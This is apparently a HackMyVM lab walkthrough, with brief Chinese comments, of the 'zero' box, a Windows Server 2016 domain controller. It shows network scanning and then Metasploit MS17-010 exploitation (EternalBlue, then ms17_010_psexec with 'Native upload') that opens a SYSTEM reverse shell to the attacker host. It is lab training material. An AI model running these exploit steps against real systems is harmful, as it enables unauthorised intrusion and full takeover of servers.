hackmyvm-zero

┌──(root㉿kali)-[~]
└─# arp-scan -I eth1 192.168.56.0/24
WARNING: Could not obtain IP address for interface eth1. Using 0.0.0.0 for
the source address, which may not be what you want.
Either configure eth1 with an IP address, or manually specify the address
with the --arpspa option.
Interface: eth1, type: EN10MB, MAC: 00:0c:29:96:80:36, IPv4: (none)
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0e       (Unknown: locally administered)
192.168.56.100  08:00:27:47:0e:01       PCS Systemtechnik GmbH
192.168.56.110  08:00:27:b9:61:da       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.136 seconds (119.85 hosts/sec). 3 responded
                                                                                                                                                           
┌──(root㉿kali)-[~]
└─# nmap -sCV -p- --min-rate 10000 192.168.56.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-24 04:04 EDT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 12.67% done; ETC: 04:04 (0:00:14 remaining)
Nmap scan report for 192.168.56.110
Host is up (0.00081s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
53/tcp  open  tcpwrapped
135/tcp open  tcpwrapped
139/tcp open  tcpwrapped
445/tcp open  tcpwrapped Windows Server 2016 Standard Evaluation 14393 tcpwrapped

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2025-07-24T23:04:41
|_  start_date: 2025-07-24T23:03:32
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: DC01
|   NetBIOS computer name: DC01\x00
|   Domain name: zero.hmv
|   Forest name: zero.hmv
|   FQDN: DC01.zero.hmv
|_  System time: 2025-07-24T16:04:32-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 17h19m59s, deviation: 4h02m35s, median: 14h59m55s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.12 seconds
┌──(root㉿kali)-[/myift]
└─# ./fscan  -h 192.168.56.110

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
192.168.56.110:135 open
192.168.56.110:139 open
192.168.56.110:445 open
192.168.56.110:88 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo 
[*]192.168.56.110
   [->]DC01
   [->]192.168.56.110
[+] MS17-010 192.168.56.110     (Windows Server 2016 Standard Evaluation 14393)
[*] NetBios 192.168.56.110  [+] DC:DC01.zero.hmv                 Windows Server 2016 Standard Evaluation 14393                                             
已完成 4/4
[*] 扫描结束,耗时: 3.072520325s
                                                                                                                                    

看样子是一个域控制器

好像是有一个MS17-010

┌──(root㉿kali)-[/myift/bachang/win/zero]
└─# msfconsole
Metasploit tip: Use the resource command to run commands from a file
                                                  

                 _---------.                                                                                                                               
             .' #######   ;."                                                                                                                              
  .---,.    ;@             @@`;   .---,..                                                                                                                  
." @@@@@'.,'@@            @@@@@',.'@@@@ ".                                                                                                                 
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;                                                                                                                 
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'                                                                                                                 
     "--'.@@@  -.@        @ ,'-   .'--"                                                                                                                    
          ".@' ; @       @ `.  ;'                                                                                                                          
            |@@@@ @@@     @    .                                                                                                                           
             ' @@@ @@   @@    ,                                                                                                                            
              `.@@@@    @@   .                                                                                                                             
                ',@@     @   ;           _____________                                                                                                     
                 (   3 C    )     /|___ / Metasploit! \                                                                                                    
                 ;@'. __*__,."    \|--- \_____________/                                                                                                    
                  '(.,...."/                                                                                                                               


       =[ metasploit v6.4.50-dev                          ]
+ -- --=[ 2496 exploits - 1283 auxiliary - 431 post       ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search ms17-010

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .


Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

msf6 > use 24
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                               Required  Description
   ----         ---------------                               --------  -----------
   CHECK_ARCH   true                                          no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                          no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                         no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlis  yes       List of named pipes to check
                ts/named_pipes.txt
   RHOSTS                                                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                                                        using-metasploit.html
   RPORT        445                                           yes       The SMB service port (TCP)
   SMBDomain    .                                             no        The Windows domain to use for authentication
   SMBPass                                                    no        The password for the specified username
   SMBUser                                                    no        The username to authenticate as
   THREADS      1                                             yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.56.110
rhosts => 192.168.56.110
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.56.110:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[*] 192.168.56.110:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

扫描后进一步确定存在永恒之蓝漏洞

msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > eternalblue
[-] Unknown command: eternalblue. Run the help command for more details.
msf6 > search eternalblue

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .


Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Win
                                             dows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows
                                              Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded
                                             Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.106.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.56.110
rhosts => 192.168.56.110
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.56.103
lhost => 192.168.56.103
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.56.103:4444 
[*] 192.168.56.110:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.56.110:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[*] 192.168.56.110:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.56.110:445 - The target is vulnerable.
[*] 192.168.56.110:445 - Connecting to target for exploitation.
[+] 192.168.56.110:445 - Connection established for exploitation.
[+] 192.168.56.110:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.110:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.56.110:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.56.110:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva
[*] 192.168.56.110:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   
[+] 192.168.56.110:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.110:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.56.110:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.110:445 - Starting non-paged pool grooming
[+] 192.168.56.110:445 - Sending SMBv2 buffers
[+] 192.168.56.110:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.110:445 - Sending final SMBv2 buffers.
[*] 192.168.56.110:445 - Sending last fragment of exploit packet!
[*] 192.168.56.110:445 - Receiving response from exploit packet
[+] 192.168.56.110:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.110:445 - Sending egg to corrupted connection.
[*] 192.168.56.110:445 - Triggering free of corrupted buffer.
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.56.110:445 - Connecting to target for exploitation.
[+] 192.168.56.110:445 - Connection established for exploitation.
[+] 192.168.56.110:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.110:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.56.110:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.56.110:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva
[*] 192.168.56.110:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   
[+] 192.168.56.110:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.110:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.56.110:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.110:445 - Starting non-paged pool grooming
[+] 192.168.56.110:445 - Sending SMBv2 buffers
[+] 192.168.56.110:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.110:445 - Sending final SMBv2 buffers.
[*] 192.168.56.110:445 - Sending last fragment of exploit packet!
[*] 192.168.56.110:445 - Receiving response from exploit packet
[+] 192.168.56.110:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.110:445 - Sending egg to corrupted connection.
[*] 192.168.56.110:445 - Triggering free of corrupted buffer.
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.56.110:445 - Connecting to target for exploitation.
[+] 192.168.56.110:445 - Connection established for exploitation.
[+] 192.168.56.110:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.110:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.56.110:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.56.110:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva
[*] 192.168.56.110:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   
[+] 192.168.56.110:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.110:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.56.110:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.110:445 - Starting non-paged pool grooming
[+] 192.168.56.110:445 - Sending SMBv2 buffers
[+] 192.168.56.110:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.110:445 - Sending final SMBv2 buffers.
[*] 192.168.56.110:445 - Sending last fragment of exploit packet!
[*] 192.168.56.110:445 - Receiving response from exploit packet
[+] 192.168.56.110:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.110:445 - Sending egg to corrupted connection.
[*] 192.168.56.110:445 - Triggering free of corrupted buffer.
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.

windows/smb/ms17_010_eternalblue 这个模块已经拿到了system执行权限但是shell没有被弹回来

msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.56.110
RHOSTS => 192.168.56.110
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.56.103
LHOST => 192.168.56.103
msf6 exploit(windows/smb/ms17_010_psexec) > 
msf6 exploit(windows/smb/ms17_010_psexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.56.103:8888 
[*] 192.168.56.110:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 192.168.56.110:445 - Built a write-what-where primitive...
[+] 192.168.56.110:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.56.110:445 - Selecting PowerShell target
[*] 192.168.56.110:445 - Executing the payload...
[+] 192.168.56.110:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/x64/shell/reverse_tcp 
PAYLOAD => windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.56.103:8888 
[*] 192.168.56.110:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 192.168.56.110:445 - Built a write-what-where primitive...
[+] 192.168.56.110:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.56.110:445 - Selecting PowerShell target
[*] 192.168.56.110:445 - Executing the payload...
[+] 192.168.56.110:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

msf6 exploit(windows/smb/ms17_010_psexec) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Automatic
    1   PowerShell
    2   Native upload
    3   MOF upload

msf6 exploit(windows/smb/ms17_010_psexec) > set target 2
target => 2
msf6 exploit(windows/smb/ms17_010_psexec) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
    0   Automatic
    1   PowerShell
=>  2   Native upload
    3   MOF upload


msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.56.103:8888 
[*] 192.168.56.110:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 192.168.56.110:445 - Built a write-what-where primitive...
[+] 192.168.56.110:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.56.110:445 - Uploading payload... lZPldmxD.exe
[*] 192.168.56.110:445 - Created \lZPldmxD.exe...
[+] 192.168.56.110:445 - Service started successfully...
[*] 192.168.56.110:445 - Deleting \lZPldmxD.exe...
[*] Sending stage (336 bytes) to 192.168.56.110
[*] Command shell session 1 opened (192.168.56.103:8888 -> 192.168.56.110:49791) at 2025-07-24 05:07:56 -0400


Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----
          

C:\Windows\system32>whoami
whoami
nt authority\system

windows/smb/ms17_010_psexec一开始和上面的模块是一样的都是没法做到最后的反弹shell我们切换位上传文件来弹shell就成功了